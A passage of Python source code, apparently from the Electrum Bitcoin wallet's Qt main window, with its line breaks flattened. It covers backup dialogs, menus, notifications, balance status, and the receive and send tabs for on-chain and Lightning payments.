_("File Backup")) vbox = QVBoxLayout(d) grid = QGridLayout() backup_help = "" backup_dir = self.config.get('backup_dir') backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help) msg = _('Please select a backup directory') if self.wallet.has_lightning() and self.wallet.lnworker.channels: msg += '\n\n' + ' '.join([ _("Note that lightning channels will be converted to channel backups."), _("You cannot use channel backups to perform lightning payments."), _("Channel backups can only be used to request your channels to be closed.") ]) self.backup_dir_e = QPushButton(backup_dir) self.backup_dir_e.clicked.connect(self.select_backup_dir) grid.addWidget(backup_dir_label, 1, 0) grid.addWidget(self.backup_dir_e, 1, 1) vbox.addLayout(grid) vbox.addWidget(WWLabel(msg)) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return try: new_path = self.wallet.save_backup() except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) return if new_path: msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path) self.show_message(msg, title=_("Wallet backup created")) else: self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_wallet_info) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.export_invoices()) requests_menu = wallet_menu.addMenu(_("Requests")) requests_menu.addAction(_("Import"), lambda: self.import_requests()) requests_menu.addAction(_("Export"), lambda: self.export_requests()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction if sys.platform == 'darwin': # "Settings"/"Preferences" are all reserved keywords in macOS. # preferences_action will get picked up based on name (and put into a standardized location, # and given a standard reserved hotkey) # Hence, this menu item will be at a "uniform location re macOS processes" preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences # Add another preferences item, to also have a "uniform location for Electrum between different OSes" tools_menu.addAction(_("Electrum preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network)) tools_menu.addAction(_("&Lightning Gossip"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network)) tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) if not constants.net.TESTNET: help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().server.host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_bitcoin_paper(self): filename = os.path.join(self.config.path, 'bitcoin.pdf') if not os.path.exists(filename): s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713") if not s: return s = s.split("0100000000000000")[1:-1] out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20] with open(filename, 'wb') as f: f.write(bytes.fromhex(out)) webopen('file:///' + filename) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(latest_version=version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue total_amount += tx_wallet_delta.delta self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) def timer_actions(self): self.request_list.refresh_status() # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() self.notify_transactions() def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str: """Formats amount as string, converting to desired unit. E.g. 500_000 -> '0.005' """ return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount_sat) -> str: """Returns string with both bitcoin and fiat amounts, in desired units. E.g. 500_000 -> '0.005 BTC (191.42 EUR)' """ text = self.config.format_amount_and_units(amount_sat) x = self.fx.format_amount_and_units(amount_sat) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fiat_and_units(self, amount_sat) -> str: """Returns string of FX fiat amount, in desired units. E.g. 500_000 -> '191.42 EUR' """ return self.fx.format_amount_and_units(amount_sat) if self.fx else '' def format_fee_rate(self, fee_rate): return self.config.format_fee_rate(fee_rate) def get_decimal_point(self): return self.config.get_decimal_point() def base_unit(self): return self.config.get_base_unit() def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.has_lightning(): l = self.wallet.lnworker.get_balance() text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) if self.status_button: self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.channels_list.update_rows.emit(wallet) self.update_completions() def create_channels_tab(self): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_channel(self, channel_id): from . import channel_details channel_details.ChannelDetailsDialog(self, channel_id).show() def show_transaction(self, tx, *, tx_desc=None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, parent=self, desc=tx_desc) def show_lightning_transaction(self, tx_item): from .lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx_item) d.show() def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 0, 0) grid.addWidget(self.receive_message_e, 0, 1, 1, 4) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 1, 0) grid.addWidget(self.receive_amount_e, 1, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.connect_fields(self, self.amount_e, self.fiat_send_e, None) self.expires_combo = QComboBox() evl = sorted(pr_expiration_values.items()) evl_keys = [i[0] for i in evl] evl_values = [i[1] for i in evl] default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) try: i = evl_keys.index(default_expiry) except ValueError: i = 0 self.expires_combo.addItems(evl_values) self.expires_combo.setCurrentIndex(i) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) def on_expiry(i): self.config.set_key('request_expiry', evl_keys[i]) self.expires_combo.currentIndexChanged.connect(on_expiry) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0) grid.addWidget(self.expires_combo, 2, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 2, 1) self.clear_invoice_button = QPushButton(_('Clear')) self.clear_invoice_button.clicked.connect(self.clear_receive_tab) self.create_invoice_button = QPushButton(_('New Address')) self.create_invoice_button.setIcon(read_QIcon("bitcoin.png")) self.create_invoice_button.setToolTip('Create on-chain request') self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_invoice_button) buttons.addWidget(self.create_invoice_button) if self.wallet.has_lightning(): self.create_invoice_button.setText(_('New Address')) self.create_lightning_invoice_button = QPushButton(_('Lightning')) self.create_lightning_invoice_button.setToolTip('Create lightning request') self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png")) self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True)) buttons.addWidget(self.create_lightning_invoice_button) grid.addLayout(buttons, 4, 3, 1, 2) self.receive_payreq_e = ButtonsTextEdit() self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT)) self.receive_payreq_e.addCopyButton(self.app) self.receive_payreq_e.setReadOnly(True) self.receive_payreq_e.textChanged.connect(self.update_receive_qr) self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=220) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.setFont(QFont(MONOSPACE_FONT)) self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code")) self.receive_requests_label = QLabel(_('Receive queue')) from .request_list import RequestList self.request_list = RequestList(self) receive_tabs = QTabWidget() receive_tabs.addTab(self.receive_address_e, _('Address')) receive_tabs.addTab(self.receive_payreq_e, _('Request')) receive_tabs.addTab(self.receive_qr, _('QR Code')) receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0)) receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i)) receive_tabs_sp = receive_tabs.sizePolicy() receive_tabs_sp.setRetainSizeWhenHidden(True) receive_tabs.setSizePolicy(receive_tabs_sp) def maybe_hide_receive_tabs(): receive_tabs.setVisible(bool(self.receive_payreq_e.text())) self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs) maybe_hide_receive_tabs() # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addWidget(receive_tabs) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_requests(self, keys): for key in keys: self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) if is_lightning: if not self.wallet.lnworker.channels: self.show_error(_("You need to open a Lightning channel first.")) return # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy) key = self.wallet.lnworker.add_request(amount, message, expiry) else: key = self.create_bitcoin_request(amount, message, expiry) if not key: return self.address_list.update() assert key is not None self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') self.receive_message_e.setText('') # copy to clipboard r = self.wallet.get_request(key) content = r.invoice if r.is_lightning() else r.get_address() title = _('Invoice') if is_lightning else _('Address') self.do_copy(content, title=title) def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]: addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): # imported wallet msg = [ _('No more addresses in your wallet.'), ' ', _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ', _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n', _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'), ] if not self.question(''.join(msg)): return addr = self.wallet.get_receiving_address() else: # deterministic wallet if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, content: str, *, title: str = None) -> None: self.app.clipboard().setText(content) if title is None: tooltip_text = _("Text copied to clipboard").format(title) else: tooltip_text = _("{} copied to clipboard").format(title) QToolTip.showText(QCursor.pos(), tooltip_text, self) def clear_receive_tab(self): self.receive_payreq_e.setText('') self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() self.request_list.clearSelection() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def update_receive_qr(self): uri = str(self.receive_payreq_e.text()) if maybe_extract_bolt11_invoice(uri): # encode lightning invoices as uppercase so QR encoding can use # alphanumeric mode; resulting in smaller QR codes uri = uri.upper() self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) self.payto_e.addPasteButton(self.app) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = FreezableLineEdit() self.message_e.setMinimumWidth(700) grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(100) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.send_button = EnterButton(_("Pay") + "...", self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.save_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 4) self.amount_e.shortcut.connect(self.spend_max) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) self.set_onchain(False) self.invoices_label = QLabel(_('Send queue')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) hbox.addStretch(1) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return outputs = self.payto_e.get_outputs(True) if not outputs: return make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=self.get_coins(), outputs=outputs, fee=fee_est, is_sweep=False) try: try: tx = make_tx(None) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. tx = make_tx(0) except MultipleSpendMaxTxOutputs as e: self.max_button.setChecked(False) self.show_error(str(e)) return except NotEnoughFunds as e: self.max_button.setChecked(False) text = self.get_text_not_enough_funds_mentioning_frozen() self.show_error(text) return self.max_button.setChecked(True) amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) @protected def protect(self, func, args, password): return func(*args, password) def read_outputs(self) -> List[PartialTxOutput]: if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.scriptpubkey is None: self.show_error(_('Bitcoin Address is None')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def check_send_tab_payto_line_and_show_errors(self) -> bool: """Returns whether there are errors. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: if len(errors) == 1 and not errors[0].is_multiline: err = errors[0] self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" + f"{err.line_content[:40]}...\n\n" f"{err.exc!r}") else: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})" for err in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True return False # no errors def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]): if amount_msat is None: raise Exception("missing amount for LN invoice") amount_sat = Decimal(amount_msat) / 1000 # FIXME this is currently lying to user as we truncate to satoshis msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat)) if not self.question(msg): return self.save_pending_invoice() def task(): coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS) fut = 